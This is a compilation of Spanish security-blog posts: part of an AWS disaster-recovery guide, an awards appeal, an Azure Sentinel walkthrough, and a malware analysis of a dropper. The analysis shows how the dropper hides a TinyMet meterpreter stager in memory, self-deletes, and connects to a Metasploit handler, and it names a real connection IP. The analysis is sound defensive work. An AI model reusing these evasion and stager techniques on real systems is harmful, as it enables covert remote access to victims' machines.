replicar los datos que cambian regularmente hacia Pilot Ligth, el pequeño núcleo alrededor del cual se iniciará el entorno completo en la fase de Disaster Recovery. Los datos actualizados con menor frecuencia, como los sistemas operativos y las aplicaciones, pueden actualizarse periódicamente (Dependiendo del sistema) y almacenarlos como AMIs. [Imagen: Diagrama del sistema Pilot Light con servidores en AWS marcados como Not Running] Pasos clave para la preparación: 1. Configurar las instancias de Amazon EC2 para replicar o duplicar datos. 2. Asegurarnos que tenemos los paquetes de software personalizados compatibles y disponibles en AWS. 3. Crear y mantener AMIs de servidores clave donde se requiera una recuperación rápida. 4. Ejecute regularmente estos servidores, probar y aplicar las actualizaciones de software y los cambios de configuración. 5. Una vez armado el plan, debemos considerar automatizar el aprovisionamiento de recursos de AWS. ### Fase de recuperación con Pilot ligth Para recuperar el resto de entorno alrededor de la Pilot Ligth (Esa otra parte de la imagen anterior que no esta corriendo, y engranarla con el resto de piezas) podemos iniciar nuestros sistemas desde las AMIs en cuestión de minutos con los tipos de instancia apropiados. Para los servidores de datos dinámicos, podemos cambiar el tamaño para manejar volúmenes de producción según necesitemos o agregar nuevas capacidades. El escalado horizontal a menudo es el enfoque más rentable y escalable para agregar capacidad a un sistema. Por ejemplo, podemos agregar más servidores web en las horas punta (Algo por ejemplo a tener en cuenta si emites partidos de football y es el partidazo). Sin embargo, también podemos elegir tipos de instancia de Amazon EC2 más grandes y, por lo tanto, escalar verticalmente para aplicaciones con bases de datos relacionales. Desde una perspectiva de red, cualquier actualización de DNS requerida se puede hacer en paralelo. Después de la recuperación, debemos asegurarnos de que la redundancia se restablezca lo antes posible. Es poco probable que falle el entorno de recuperación ante desastres poco después de que falle el entorno de producción (Si es así, nos ha mirado un tuerto), pero debemos tener en cuenta este riesgo. [Imagen: Diagrama de recuperación Pilot Light en AWS con el centro de datos corporativo tachado en rojo] Pasos clave para la recuperación: 1. Iniciar las instancias de la aplicación Amazon EC2 desde las AMIs personalizadas. 2. Cambiar el tamaño de las instancias existentes de la base de datos / almacén de datos para procesar el aumento del tráfico. 3. Instancias adicionales de bases de datos / almacenes de datos para proporcionar la capacidad de recuperación del sitio DR. 4. Cambiar el DNS para apuntar a los servidores Amazon EC2. 5. Instalar y configurar cualquier sistema no basado en AMIs, si es posible y como hemos comentado antes, de forma automatizada. ## Solución Warm Site en AWS El término "sitio caliente" se utiliza para describir un escenario de recuperación ante desastres en el que una versión reducida del entorno, totalmente funcional, siempre se ejecuta en cloud (Recordando que el post es sobre AWS, si no, seria en otro entorno paralelo). Una solución de espera en caliente extiende los elementos y el Pilot Ligth y disminuye aún más el tiempo de recuperación porque algunos servicios siempre están corriendo. Al identificar los sistemas críticos para el negocio, podemos duplicar completamente estos sistemas en AWS y tenerlos siempre encendidos. Esta solución no está diseñada para llevar una carga de producción completa, pero es completamente funcional. En caso de un desastre, el sistema se amplía rápidamente para manejar la carga de producción. En AWS, esto se puede hacer agregando más instancias al balanceador de carga y redimensionando los servidores de pequeña capacidad para que se ejecuten en tipos de instancia de Amazon EC2 más grandes, es preferible escalar horizontalmente mejor que de forma vertical. ### Fase de preparación del Warm Site En la figura, observamos una solución in situ en nuestro CPD y una solución en AWS ejecutandose en el otro lado. [Imagen: Diagrama de preparación Warm Standby con base de datos esclava replicada y ELB en espera] Pasos clave para la preparación: 1. Configurar las instancias de Amazon EC2 para replicar o duplicar datos. 2. Crear y mantener las AMIs. 3. Ejecutar la aplicación utilizando una huella mínima de instancias en Amazon EC2 o infraestructura de AWS. 4. Parchear y actualizar el software y los archivos de configuración de acuerdo con nuestro entorno. ### Recuperación del Warm Site en AWS En caso de fallo del sistema de producción, el entorno en espera se ampliará para la carga de producción, y los registros DNS se cambiarán para enrutar todo el tráfico a AWS. [Imagen: Diagrama de recuperación Warm Site en AWS con servidores replicados escalados a producción] Pasos clave para la recuperación: 1. Aumentar el tamaño de las flotas de Amazon EC2 en servicio con el balanceador de carga escalando horizontalmente. 2. Iniciar las aplicaciones en tipos de instancias Amazon EC2 más grandes según sea necesario, escalando verticalmente. 3. Cambiar manualmente los registros DNS o usar la comprobación de estado automatizadas de Amazon Route 53 para que todo el tráfico se enrute al entorno de AWS. 4. Considerar usar Auto Scaling para ajustar el tamaño o acomodar la carga aumentada. 5. Agregar o ampliar la base de datos. ## Solución MultiSite implementada en AWS y en CPD Una solución MultiSite se ejecuta en AWS, así como en nuestra infraestructura in situ existente en el CPD en este caso, con una configuración activo-activo. El método de replicación de datos que emplea estará determinado por el punto de recuperación que elijamos (RTO - RPO). Podemos usar un servicio DNS que admita enrutamiento ponderado (Dicho así, uno dice ... ¿que es esto?, pero si os lo cambio por Round Robin, la cosa cambia), como Amazon Route 53, para enrutar el tráfico de producción a diferentes sitios que brinden el mismo servicio de aplicación. Una proporción de tráfico irá a la infraestructura en AWS, y el resto irá a la infraestructura CPD. En un desastre in situ en CPD, podemos ajustar la ponderación del DNS y enviar todo el tráfico a los servidores de AWS. La capacidad del servicio de AWS se puede aumentar rápidamente para manejar toda la carga de producción. Se puede usar Amazon EC2 Auto Scaling para automatizar este proceso y acortar tiempos. El coste de este escenario está determinado por cuánto tráfico de producción se maneja en AWS durante la operación normal. De esta forma, en la fase de recuperación, se pagará solo por lo que se usa durante el tiempo en que se requiere el entorno DR escalado completamente. ### Fase de preparación MultiSite en AWS La siguiente figura muestra el enrutamiento Round Robin del DNS Amazon Route 53 para enrutar una parte del tráfico a AWS. La aplicación en AWS podría acceder a las fuentes de datos en el sistema de producción in situ. Los datos se replican o reflejan en la infraestructura de AWS al estar activo-activo, en diferencia con los entornos anteriores. [Imagen: Diagrama de preparación Activo-Activo en AWS con Route 53 dirigiendo tráfico a ambos entornos] Pasos clave para la preparación del entorno Activo-Activo AWS: 1. Configura el entorno AWS para duplicar el entorno de producción in situ. 2. Configura lagestión Round Robin en el DNS, o la tecnología de enrutamiento de tráfico similar, para distribuir las solicitudes/peticiones a ambos sitios. Configura la conmutación por error automática. ### Fase de recuperación Activo-Activo AWS La figura muestra el cambio en el enrutamiento del tráfico en caso de un desastre en el sitio. El tráfico se corta y redirige a la infraestructura de AWS mediante la actualización del DNS, y todo el tráfico y las consultas de datos se realizan sobre la infraestructura de AWS. [Imagen: Diagrama de recuperación Activo-Activo en AWS con servidores duplicados escalados a producción] Recuperación Disaster Recovery Activo-Activo AWS : 1. De forma manual o mediante la conmutación por error del DNS(Que sería lo lógico), cambiamos la ponderación del DNS para que todas las solicitudes se envíen a AWS. 2. Tenemos que tener una lógica de aplicación para la conmutación por error para usar los servidores de bases de datos locales de AWS en la consultas. 3. Muy muy muy importante. Considera usar Auto Scaling para ajustar automáticamente el tamaño de las máquinas AWS. ## Réplica de datos Cuando replicamos datos en una ubicación remota, debemos considerar: - Distancia entre sitios: las distancias más grandes generalmente están sujetas a más latencia o fluctuación. - Ancho de banda disponible: La amplitud y variabilidad de las interconexiones. - Velocidad de datos requerida por la aplicación: la velocidad de datos debe ser inferior al ancho de banda disponible. - Tecnología de replicación: La tecnología de replica debe ser paralela (para que podamos usar la red eficazmente). Similar a la típica linea de Backup en sistemas (Servicio-Gestión-Backup). Hay dos enfoques principales para replicar datos: 1. Replicación sincrónica : Los datos se actualizan atómicamente en múltiples ubicaciones. Esto pone una dependencia en el rendimiento y la disponibilidad de la red. Por ejemplo, cuando se implementa en modo Multi-AZ, Amazon RDS usa replicación sincrónica para duplicar datos en una segunda zona de disponibilidad. Esto garantiza que los datos no se pierdan si la zona de disponibilidad primaria no está disponible. 2. Replicación asincrónica: Los datos no se actualizan atómicamente en varias ubicaciones. Se transfiere según lo permita el rendimiento y la disponibilidad de la red, y la aplicación continúa escribiendo datos que aún podrían no estar completamente replicados. Muchos sistemas de bases de datos admiten la replicación de datos asíncrona. Esto es aceptable en muchos escenarios, por ejemplo, como fuente de respaldo o informes / casos de solo lectura. ## Conclusión Existen muchas opciones y variaciones para un plan de Disaster Recovery. Hemos visto los escenarios comunes, que van desde simples copias de seguridad y restauración hasta soluciones de múltiples sitios con tolerancia a fallos. AWS brinda un control preciso y muchos componentes básicos para construir una solución DR adecuada (No lo hemos comentado, pero lo cierto es que podriamos hacer lo mismo en Azure, me lo apunto para otro Post), dados nuestros objetivos DR (RTO y RPO) y nuestro presupuesto (La ventaja, pagamos por lo que usamos a diferencia de los antiguos planes), una ventaja clave para un DR, donde se necesita una infraestructura significativa de una forma rápida, pero solo en caso de un desastre. En mi opinión, es la mejor forma de empezar a implementar Clouds hibridas, entre nuesto CPD y AWS, si aún somo de los que no confiamos en la Cloud. Es tan sencillo como hacer un TCO exahustivo de vuestro plan de recuperación ante desastres y barajar la opción de migrar parte de vuestros sistemas a la nube. --- # Nos volvemos a presentar a los premios 20 Blogs ¡Nos ayudas! URL: https://ciberseguridad.blog/nos-volvemos-a-presentar-a-los-premios-20-blogs-nos-ayudas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-07-20 Actualizado: 2026-10-05 Tema: Noticias Seguridad > El año pasado fuimos finalistas de los premios 20Blogs en la categoría "Innovación, Ciencia y Tecnología" y este año lo volvemos a intentar. ! NOS AYUDAS ¡ El año pasado fuimos finalista al mejor blog "Innovación, Ciencia y Tecnología" de los premios 20Blogs que organiza el periódico 20 Minutos, y ... continuaremos intentándolo hasta conseguirlo. > “Da igual. Prueba otra vez. Fracasa otra vez. Fracasa mejor” - Samuel Beckett Un merecido premio que obtuvo la gente de Principia, y que nos dejo a las puertas del ansiado título. Pero nos fuimos con muy buen sabor de boca, con la anecdota de haber conocido a la persona detras de uno de los blogs que leo asiduamente "La bolsa de Psico" y de pasar un buen rato. [Imagen: Tabla de finalistas de los Premios 20Blogs con Ciberseguridad.blog señalado con una flecha] ## Así puedes ayudar a CIBERSEGURIDAD .blog Lo cierto es, que este año ha cambiado la metodología del concurso, y no me queda muy claro si realmente hay que hacer algo, o si es necesario que votéis como el año pasado, pero ante la duda, y aunque no sea necesario, vuestro apoyo siempre sera bien recibido de cara al jurado, por ello, os pido que al menos votéis, sin necesidad de registraros. 1. Accede a la ficha de La Blogosfera de CIBERSEGURIDAD .blog 2. Valora el Blog: [Imagen: Ficha de Ciberseguridad.blog en La Blogoteca con flecha señalando las estrellas de valoración] > Millones de gracias por vuestro apoyo. Cada uno los logros del blog, es gracias a vosotros. Ojala este año lo consigamos, pero si no, como os he indicado, será al que viene, y si no, al otro, y si no ..... --- # Ocultando Tinymet URL: https://ciberseguridad.blog/ocultando-tinymet/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2019-07-14 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Aprende a ocultar TinyMet,una pequeña plataforma de meterpreter de “4,5 kilobytes”, que admite múltiples configuraciones. ¡ CONÓCELO ! Hola a todos ! Hoy os voy a hablar sobre una muestra que me pareció muy interesante. Es esta: [Imagen: Panel con los hashes MD5, SHA1, SHA256 y SHA512 de un ejecutable PE32 sospechoso] [Imagen: Herramienta de análisis PE detectando el compilador Visual C++ y el enlazador del ejecutable] Podemos ver las siguientes funciones: [Imagen: Consola de radare2 listando las funciones importadas de KERNEL32 y MSVCRT del binario] Podemos echar un vistazo inicial a las funciones, por si aparece algo interesante que nos llame demasiado la atención. Podemos intuir que algo espera por parámetros. Es mejor obtener primero los “imports” (funciones de la API de Windows que serán cargadas al ejecutar la muestra) y obtener unas conclusiones iniciales de por donde comenzar a analizar. [Imagen: Listado de funciones importadas de USER32, KERNEL32 y SHELL32 en la consola de radare2] Se nos puede ocurrir que reciba algo por parámetros (GetCommandLineA, GetCommandLineW), que escriba algo a disco (CreateFileA, WriteFile), que oculte cargar funciones al inicio (LoadLibraryA, GetProcAddress) para llamarlas después, en los imports, finalizar el programa si algo no le gusta o si ha realizado alguna acción concreta (ExitProcess), buscar algo “oculto a simple vista” que utilizará después asignando memoria (VirtualAllocEx), ejecutar algún programa (ShellExecuteA), etc. Si ponemos breakpoints en estas funciones podremos ir viendo más despacio todo lo que hacen. Esto es solo el comienzo, ya que seguramente utilizará otras funciones que cargará en tiempo de ejecución (LoadLibraryA, GetProcAddress) y que ahora mismo no podremos saber cuales son. Ponemos los breakpoints como dije y veamos qué hace. [Imagen: Ventana de puntos de interrupción de OllyDbg sobre funciones de KERNEL32 y SHELL32] Como ya lo he analizado antes, voy a preparar el entorno. Voy a añadir unos parámetros a la llamada del binario con el Ollydbg (Olly, lo sé, pero soy un clásico :P) [Imagen: Ventana de OllyDbg configurando el argumento de línea de comandos con la IP 192.168.138.135:443] Introduzco un valor entero (no vale cualquier valor, tiene que ser entre 0 y 3, después veremos porqué). Añado una dirección IP y un puerto. Algunos viendo esta imagen, ya podrán imaginarse de lo que se podría tratar. Continúo… Si vamos pulsando F9 o Run, vamos parando en cada uno de los breakpoints. Pondré sólo los más interesantes. [Imagen: Depurador OllyDbg mostrando los registros del procesador y el error ERROR_INVALID_HANDLE] [Imagen: Volcado de memoria en OllyDbg con una llamada a WriteFile desde kernel32 y cadenas Unicode] Crea un fichero de autoborrado: Se trata de un fichero bat. [Imagen: Volcado de memoria en OllyDbg con una llamada a WriteFile desde ntdll y el archivo ercawerfcawef.bat] Y se prepara para su ejecución cuando finalice lo que tiene que hacer, aún no lo hemos visto. [Imagen: Bloc de notas con el script ercawerfcawef.bat que borra en bucle un ejecutable sospechoso] Seguimos con la obtención de direcciones de funciones de API para utilizarlas después, son muchas… Esta es interesante, carga urlmon.dll, para descarga de contenido html. [Imagen: Depurador OllyDbg mostrando una llamada a LoadLibraryA cargando la librería urlmon.dll] [Imagen: Depurador OllyDbg resolviendo con GetProcAddress la función CreateUri de urlmon.dll] Funciones utilizadas para tratar el registro de Windows. [Imagen: Depurador mostrando una llamada a GetProcAddress resolviendo la función RegOpenKeyExW de ADVAPI32] [Imagen: Depurador resolviendo dinámicamente la función RegGetValueW de la librería ADVAPI32 mediante GetProcAddress] [Imagen: Vista de depurador con llamada a GetProcAddress obteniendo la dirección de RegCloseKey] Funciones para saber qué usuario está autenticado en el equipo. [Imagen: Depurador resolviendo la función GetUserNameExW del módulo sspicli mediante GetProcAddress] Funciones para obtener directorios en base a un valor CSIDL. [Imagen: Depurador obteniendo con GetProcAddress la dirección de SHGetFolderPathW en SHELL32] Funciones para tratar memoria. [Imagen: Depurador resolviendo la función VirtualAlloc de kernel32 mediante GetProcAddress] [Imagen: Depurador resolviendo la función VirtualProtect de kernel32 con GetProcAddress] Para estas, voy a poner un nuevo breakpoint para cada una. [Imagen: Depurador resolviendo la función VirtualFree de kernel32 mediante GetProcAddress] Comienza el proceso esperado. [Imagen: Llamada a VirtualAlloc reservando memoria para la cadena de conexión 192.168.138.135:443] [Imagen: Segunda llamada a VirtualAlloc reservando el mismo bloque con la IP 192.168.138.135:443] [Imagen: Llamada a VirtualProtect cambiando el bloque de memoria a permisos PAGE_EXECUTE_READWRITE] [Imagen: Vista hexadecimal de la memoria descifrada tras VirtualProtect con el retorno a 16fa13de] Si nos fijamos en la memoria, ha aparecido un nuevo ejecutable. [Imagen: Mapa de memoria y volcado hexadecimal del archivo R000000000b.clb en Windows Registration] Ahora esa asignación de memoria es ejecutable gracias a VirtualProtect (visto antes). Si bajamos el scroll, podemos ver de lo que se trata: [Imagen: Mapa de memoria mostrando el volcado hexadecimal de setupapi.dll.mui en System32] TinyMet v0.2. Según podemos leer en la página del creador de esta herramienta, se trata de “TinyMet is a tiny “4.5 kilobytes” flexible meterpreter stager, which supports multiple meterpreter transports, setting LPORT and LHOST during runtime.”. Si extraemos el binario de la memoria y utilizamos PE-Bear para “arreglarlo”: [Imagen: Editor de cabeceras PE mostrando las secciones .text, .data e .idata del ejecutable] [Imagen: Cuadro de diálogo del editor PE preguntando si redimensionar el archivo y la imagen] [Imagen: Ventana de confirmación indicando que el redimensionado del ejecutable se completó con éxito] Lo guardamos. [Imagen: Ventana de éxito confirmando el volcado del ejecutable Tinymet_v02.exe a disco] Lo abrimos con PE Studio para ver su contenido, ya está desempaquetado y funcionando. Así que ya sabemos lo que contenía el binario original un Tinymet v0.2. [Imagen: Herramienta de análisis de cadenas mostrando el uso y los transportes del malware TinyMet v0.2] Continúa cargando un sin fin de funciones de la API. Podríamos aseguraros que está cargado en memoria. Yo uso una herramienta programada por mí: [Imagen: Herramienta de búsqueda de cadenas mostrando el hallazgo de TinyMet v0.2 en el proceso 3560] Que corresponde con la muestra que está siendo analizada: [Imagen: Lista de procesos en ejecución analizados con la herramienta de búsqueda de cadenas TinyMet v0.2] El objetivo de todo esto es cargar ese binario en memoria y ejecutarlo sin que aparezca lo que es en los “strings”, de esta forma pasa desapercibido. Si no se le pasa parámetros se autoborra, interpreta que no es llamado por el malware original que lo dropea. Pero seguimos sin ver lo que hace una vez se le pasan los parámetros iniciales. Desactivo todos los breakpoint y pulso F9: [Imagen: Tabla de depurador con puntos de interrupción sobre GetProcAddress, VirtualAlloc y otras funciones de KERNEL32] Pero antes, os contaré que hice antes de ejecutar la muestra. Configuré el Metasploit de la siguiente manera: [Imagen: Consola de Metasploit mostrando las opciones del payload reverse_https con el listener HTTPS iniciado] Ya sólo nos queda pulsar F9 o Run y ver que ocurre. [Imagen: Cuadro de error de Windows indicando que el proceso malicioso dejó de funcionar] [Imagen: Consola de Metasploit registrando las peticiones HTTPS entrantes del meterpreter en el objetivo] Se produce la conexión pero se produce un crash, puede que sea por la versión de mi Metasploit (muy antiguo 3.4 para esta demo), por el SSOO de análisis (W7 32 bits para esta demo), etc. Probemos con otro valor y configuración en el Metasploit. [Imagen: Consola mostrando los cuatro tipos de transporte disponibles para tinymet.exe con un ejemplo de uso] Lo dejamos todo funcionando de nuevo, esta vez utilizaremos reverse_tcp. [Imagen: Metasploit configurando multi/handler con payload Meterpreter reverse_tcp hacia la IP 192.168.138.135] Lo volvemos a ejecutar, esta vez desde la consola de Windows, ya hemos visto lo que hace el binario. Y se conecta perfectamente al Metasploit. En el caso de no pasarle parámetros (como ya dije antes), el binario utiliza el fichero “.bat” que vimos de borrado. Asume que quien lo llama, no es adecuado para él, por lo que lo borra directamente. Os animo a que mireis más detenidamente TinyMet, ), teneis el código fuente ;- La muestra usada , podeis encontrarla aquí. Aquí podeis ver como la dll dropea la muestra y se produce una conexión contra esa IP que veis y ese puerto: [Imagen: Árbol de procesos con rundll32.exe cargando S05.dll y conectando al IP 89.144.25.92 por el puerto 443] En esta otra muestra: Al llamarse sin parámetros, simplemente, se borra. [Imagen: Panel de análisis mostrando cmd.exe ejecutando un archivo batch ofuscado con puntuación de riesgo 7/71] --- # Azure Sentinel, en nuevo SIEM de Microsoft que dará que hablar. URL: https://ciberseguridad.blog/azure-sentinel-en-nuevo-siem-de-microsoft-que-dara-que-hablar/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-06-30 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Azure Sentinel la suite de seguridad de Microsoft perfecta para entornos de cloud híbridas , Azure , AWS o locales. Mucho más que un SIEM. !CONÓCELO¡ Suena a utopia, pero ¿No sería bonito si pudiésemos ver amenazas y detenerlas antes de que sucedan? Los recientes avances tecnológicos en cloud unido a la inteligencia artificial podrian poner este objetivo al alcance. Fruto de la busqueda de dicha utopia, nace una de estas nuevas tecnologías llama Azure Sentinel, que en términos simples, actúa como un tipo de agente virtual, vigilando nuestra infraestructura cloud de Microsoft Azure, que recopila datos de todos nuestros dispositivos, aplicaciones y usuarios para detectar, investigar y responde a las amenazas contra nuestro negocio. [Vídeo](https://www.youtube.com/watch?v=XXZp6LQZSJU) ## Azure Sentinel no es solo un SIEM Azure Sentinel es el nuevo juguete de Microsoft para el entorno de seguridad en cloud híbrida: diseñado para proporcionar análisis inteligentes habilitados para la cloud no solo para sus recursos de Azure, sino también para recursos locales y otros recursos cloud, como Office 365 y Amazon Web Services. Azure Sentinel es un producto de gestión de eventos de información de seguridad (SIEM) con respuesta automática y orquestación de seguridad (SOAR). A diferencia de otras soluciones locales, Azure Sentinel tiene mucho potencial, por varios motivos: - No requiere una instalación compleja ni una configuración en la infraestructura que consuma mucho tiempo, ya que está completamente basada en cloud, con inteligencia artificial y capacidades de escalado. - Azure Sentinel es una solución híbrida de seguridad en cloud, capaz de procesar y analizar datos de Azure y otros servicios de proveedores cloud. - Puede analizar datos de soluciones de seguridad de terceros y también analizar datos de Office 365, Cloud App Security, Azure Information Protection y otros. La enorme cantidad de datos que generan los recursos híbridos requiere una gran cantidad de poder de cómputo para analizar y obtener información útil. Azure Sentinel, puede ayudarnos a proporcionar distintas capacidades en relación con las cuatro áreas o etapas cruciales que nos define el NIST: - Recolectar: Recopilar datos de múltiples fuentes y clouds, locales, aplicaciones, infraestructura, usuarios, servicios y otras posibles fuentes de valor. - Detectar: Detectar amenazas sobre los recursos protegidos y monitorizarlos a medida que ocurren, minimizando el tiempo de reacción ante amenazas. - Investigar: Azure Sentinel desarrolla una inteligencia artificial, capz de buscar y descubrir actividades maliciosas sobre los activos protegidos. - Respuesta: Una vez que se conoce una amenaza, evita las acciones manuales y responde a las amenazas con tareas automatizadas. Como hemos visto anteriormente, mediante las soluciones SOAR. De momentro Azure Sentinel está, podriamos decir , en una "Fase Beta" y no todas las funciones están disponibles, y lo más importante, desconocemos el precio. ## El SIEM tradicional y la cloud: una combinación agridulce. Como sabreis, Microsoft tiene una solución EDR llamada Windows Defender. Pero tiene muchas más ofertas. Por ejemplo, también tienen soluciones específicas para proteger nuestros datos valiosos, como Cloud App Security y Office 365 ATP. Podemos proteger nuestra identidad con Azure AD y Azure ATP. Microsoft también tiene Azure Security Center para proteger los activos que se ejecutan en Microsoft Azure, y hay muchas más soluciones de seguridad que posiblemente, no sabias que Microsoft tenia. [Imagen: Diagrama de Windows Defender ATP consultando Office 365 y SmartScreen ante un PDF sospechoso] Una cosa que parecía faltar era un orquestador central (SOAR). Un coordinador para todos los esfuerzos de seguridad. Algo que una todo. En los últimos años, las empresas, lo que hicieron, fue conectar las alertas que las soluciones de seguridad de Microsoft estaban generando y reenviarlas a la solución SIEM local como parte de su estrategia de seguridad cloud. Pero luchan por mantenerse a la par entre el creciente volumen y la variedad de datos procesados, los usuarios insatisfechos se quejaron de la incapacidad del SIEM para escalar y del volumen de alertas que se deben investigar. Las empresas que luchan con el coste del análisis de datos y el almacenamiento de registros a menudo recurren a herramientas de código abierto como Elasticsearch, Logstash y Kibana (ELK) o Hadoop para crear sus propios almacenes de datos locales. Sin embargo, para obtener una visión útil de los datos que se recopilan, es muy probable que nos demos cuenta de que el coste de construir y administrar estas herramientas "gratuitas" es tan grande como el coste de las herramientas comerciales. ### Usando Azure Sentinel Primeramente, debemos tener un permiso de colaborador en nuestra suscripción de Azure y un área de trabajo "Log Analytics". Actualmente, Azure Sentinel admite espacios de trabajo creados solo en las siguientes regiones: - Australia Southeast - Canada Central - Central India - East U.S - East U.S. 2 EUAP (Canary) - Japan East - Southeast Asia - UK South - West Europe - West U.S Si es así, primeramente debemos habilitar Azure Sentinel: [Imagen: Página de Azure Sentinel workspaces vacía invitando a conectar un área de trabajo] 1. Vamos al Marketplaces y buscamos Azure Sentinel en el campo de búsqueda: Clic en Azure Sentinel y clic en + Agregar. 2. Elegir un workspaces para conectar Azure Sentinel. El espacio de trabajo debe crearse en una de las regiones admitidas y clic en Agregar Azure Sentinel. Una vez conectado el workspaces, debemos conectar los recursos de datos a Azure Sentinel para poder reenviar eventos (logs) y datos para su análisis: - Hacemos clic en Conectores de datos y aparecerá una lista de conectores disponibles, lo que le permitirá conectar varias fuentes de datos, desde Azure Active Directory y Office 365 a proveedores de soluciones de terceros como Cisco ASA, Fortinet, Barracuda, F5 junto con cualquier editor que admita el formato de evento común ( CEF) en los logs. [Imagen: Cuadrícula de conectores de datos de Azure Sentinel con Office 365, AWS, Cisco ASA y CEF] - Esto a mi entender, es algo a tener muy en cuenta, ya que posiblemente no todos los logs de nuestra organización son en formato CEF, y posiblemente no todos puedan ser enviados mediante syslog. Para configurar un conector o una fuente de datos, debemos hacer clic en Configurar abriendose una nueva hoja. Cada conector tiene su configuración específica y, según el conector, se requiere uno o más pasos para conectar una fuente de datos. En la imagen, podemos ver un conector de formato de evento común y sus pasos de configuración para un sistema Linux: [Imagen: Conector Common Event Format desconectado, con configuración del agente Syslog en el puerto 514] Algunos conectores no requieren más de un clic para conectarse, como el conector Azure Active Directory Identity Protection y pueden tener requisitos adicionales, como la licencia de Azure Active Directory Premium P1 / P2 : [Imagen: Conector de Azure Active Directory Identity Protection desconectado con botón para conectarlo a Sentinel] Una vez que hayamos conectado y configurado todos los orígenes de datos necesarios, Azure Sentinel comenzará a recopilar datos. Esto puede tardar varios minutos antes de que podemos ver cualquier actividad. Cuanto más tiempo pase, más datos tendremos en Azure Sentinel, aumentanso el números de eventos y alertas,comenzando a aparecer los gráficos: [Imagen: Panel de Azure Sentinel Overview mostrando 216.8K eventos, cero alertas y cero casos] Las opciones de administración de amenazas (Threat Management) y configuraciones están a la izquierda, mientras que la parte central está reservada para la descripción general de eventos, alertas y casos de uso, el gráfico que representa eventos y alertas a lo largo del tiempo y un mapa mundial que muestra la fuente y la ubicación de posibles eventos maliciosos. Se puede acceder directamente a Log Analytics desde Azure Sentinel a través de la hoja de Logs, ofreciendo la posibilidad de usar el conocido Kusto Query Language (KQL) directamente en el área de trabajo de Log Analytics conectado a Azure Sentinel: [Imagen: Consulta de Azure Sentinel Logs con SecurityEvent filtrando el EventID 4625 de inicios de sesión fallidos] Aquí podremos probar y escribir nuestras propias consultas sobre los logs que podremos usar más adelante en Analytics, para crear reglas de alerta personalizadas. Como ejemplo, la consulta de la imagen, buscará el ID de evento de seguridad número 4625 de Windows, que es la actividad de una cuenta que no pudo iniciar sesión en una máquina virtual de Windows. Para crear una regla de alerta personalizada en Analytics utilizando la misma consulta, debemos ir a la hoja de Analytics y hacer clic en + Agregar: [Imagen: Lista de reglas de alerta de Azure Sentinel incluyendo Sign ins y Failed Log ons] Ingresamos un nombre de regla, una descripción y el estado (habilitado o deshabilitado) y elegimos la gravedad de la amenaza. El panel Lógico mostrará el gráfico de resultados una vez que ingresemos la consulta KQL en el campo "Establecer Consulta" de alerta: - Fijaros que tenemos muchos "Comming Soon" [Imagen: Edición de regla de alerta con severidad Alta y gráfico de simulación para EventID 4625] [Imagen: Regla de alerta con umbral de 50 resultados y supresión activada durante 5 horas] Debemos hacer clic en Ver registros de resultados de consultas para probar inmediatamente la consulta en Log Analytics. Configuramos un valor de activación de alerta, así como la frecuencia con la que se ejecutará la misma. A medida que se agreguen las funciones, la automatización en tiempo real permitirá la activación instantánea de las alertas (De momento no las tenemos disponibles). Después de hacer clic en Guardar, se ejecutará una alerta personalizada de acuerdo con el programa predefinido y se generarán alertas si se ha alcanzado un umbral de intentos de inicio de sesión fallidos. Podemos agregar Playbooks, es decir, definir flujos de trabajo de aplicaciones lógicas, que automatizarán las acciones basadas en alertas. Podemos definir Playbooks que realizarán varias tareas automatizadas, como enviar un correo electrónico que notifique sobre un mayor número de intentos fallidos de inicio de sesión, bloquear el acceso a una máquina virtual o apagar una máquina virtual, bloquear una cuenta de usuario, poner en una lista negra las direcciones IP de los atacantes , y muchas más acciones (O eso es lo que nos dice Microsoft en su web). Una característica de Azure Sentinel que no vemos de inmediato, y aún esta en fase Beta, es Azure Sentinel Fusion. Fusion utiliza potentes algoritmos y aprendizajes automáticos para analizar, clasificar y correlar eventos de múltiples fuentes en casos de seguridad. Al parecer, los eventos no relacionados podrían estar conectados, y Fusion nos ayudaría con esta tarea. Esta opción no está habilitada de forma nativa actualmente, pero podemos hacerlo a través de Azure Cloud Shell, escribiendo el siguiente comando: az resource update --ids /subscriptions/{Subscription Guid}/resourceGroups/{Log analytics resource Group Name}/providers/Microsoft.OperationalInsights/workspaces/{Log analytics workspace Name}/providers/Microsoft.SecurityInsights/settings/Fusion --api-version 2019-01-01-preview --set properties.IsEnabled=true --subscription "{Subscription Guid}" Como Microsoft está buscando democratizar la Inteligencia Artificial, están facilitando el uso del aprendizaje automático como parte de su clasificación. En lugar de revisar un mar de alertas y correlacionar las alertas de diferentes productos manualmente, las tecnologías de ML nos ayudarán a obtener rápidamente el valor de las grandes cantidades de datos de seguridad que ingiere, compartiendoe el resultado con nosotros. Por ejemplo, podemos ver rápidamente una cuenta comprometida que se utilizó para implementar ransomware en una aplicación en cloud. Ayudando a reducir drásticamente el ruido: [Imagen: Grafo de investigación que vincula una anomalía de inicios de sesión fallidos con un PowerShell sospechoso] Azure Sentinel abarca análisis de registros de seguridad proactivos y accionables desde cloud a entornos locales, impulsados por la última tecnología de inteligencia artificial y capacidades de aprendizaje automático. Estas son algunas características de Azure Sentinel, pero hay muchas más características recientemente anunciadas como el entorno de creación de detección, los algoritmos de aprendizaje automático en plantillas, fragmentos de código, gestión de modelos, implementación de modelos, programador de flujos de trabajo, capacidades de control de versiones de datos y servicios especializados, bibliotecas de análisis de seguridad, y más ... una potente herramienta que acaba de asomar un poco la cabeza, y que nos promete un amplio abanico de posibilidades. ## El Intelligent Security Graph es el centro de todo > "Microsoft describe a ISG como una forma de 'construir' soluciones que correlacionan alertas, obtienen contexto para la investigación y automatizan las operaciones de seguridad de manera unificada". El lanzamiento de Azure Sentinel, amplifica esa estrategia y la hace realidad. El gráfico de seguridad inteligente es una pieza central del backend de Sentinel para obtener información relevante de otros servicios de Microsoft, como Azure ATP, Defender ATP, Azure Security Center, etc. Pero no solo para los servicios de Microsoft. Hace exactamente un año, en RSA 2018, muchos proveedores como Palo Alto Networks, F5, Symantec, Fortinet y Check Point integraron sus soluciones en el Intelligent Security Graph. Azure Sentinel aprovecha esas integraciones técnicas para obtener eventos de la red. Pero no solo los proveedores de red se integran con el Intelligent Security Graph de Microsoft. Nombres tan conocidos en la industria como Anomali, Sailpoint, Ziften y muchos otros se han unido a la fiesta recientemente. 